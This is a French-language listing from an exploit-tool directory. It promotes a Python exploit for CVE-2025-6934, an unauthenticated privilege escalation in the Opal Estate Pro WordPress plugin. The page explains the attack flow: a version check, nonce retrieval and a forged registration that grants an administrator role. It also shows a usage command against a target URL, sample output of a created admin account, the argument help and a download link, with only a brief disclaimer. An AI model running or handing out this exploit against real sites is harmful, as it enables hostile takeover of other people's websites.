Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6934 — Opal Estate Pro <= 1.7.5 - Élévation de privilèges non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-6934
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-6934

CVE-2025-6934

Opal Estate Pro <= 1.7.5 - Élévation de privilèges non authentifiée

Voir le dépôt
92il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2025-6934 - Élévation de privilèges non authentifiée dans Opal Estate Pro

📝 Description

Le plugin Opal Estate Pro – Property Management and Submission pour WordPress, utilisé par le thème FullHouse - Real Estate Responsive WordPress Theme, est vulnérable à une élévation de privilèges dans toutes les versions jusqu'à 1.7.5 incluse.


  • Identifiant CVE : CVE-2025-6934
  • Score CVSS : 9.8 (Critique)
  • Publié le : 30 juin 2025

⚙️ Informations sur le script

Cet exploit Python automatise le processus d'élévation de privilèges en :

  • Vérifiant la version vulnérable du plugin via readme.txt.
  • Récupérant le nonce requis depuis la page d'inscription.
  • Envoyant une requête d'inscription falsifiée pour obtenir un accès Administrateur.

🚀 Exemple d'utilisation

root@kitploit:~
python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234

📤 Exemple de sortie

root@kitploit:~
[•] Vérification de la version du plugin :
    [+] Version vulnérable détectée : 1.7.5

[•] Tentative d'exploitation démarrée
    [+] Nonce trouvé : 70dd70630b
    [+] Code HTTP : 200

[✔] Exploitation réussie !
    --------------------------
    Nom d'utilisateur : nxploitedadmin
    Email    : [email protected]
    Mot de passe : nxp1234
    Rôle     : administrateur
    --------------------------

Exploit par : Khaled_alenazi (Nxploited) | https://github.com/Nxploited

🛠️ Arguments et aide

root@kitploit:~
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD

CVE-2025-6934 Exploit par Khaled Alenazi (Nxploited)

options:
  -h, --help              affiche ce message d'aide et quitte
  -u, --url URL           URL cible (ex. http://site.com/path/)
  -mail, --newmail NEWMAIL
                          Email à enregistrer comme administrateur
  -password, --newpassword NEWPASSWORD
                          Mot de passe pour le nouvel utilisateur administrateur

⚠️ Avis de non-responsabilité

Ce script est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
Toute utilisation non autorisée de cet outil contre des cibles sans consentement est strictement interdite.


Par : Khaled_alenazi (Nxploited)

Télécharger l’outil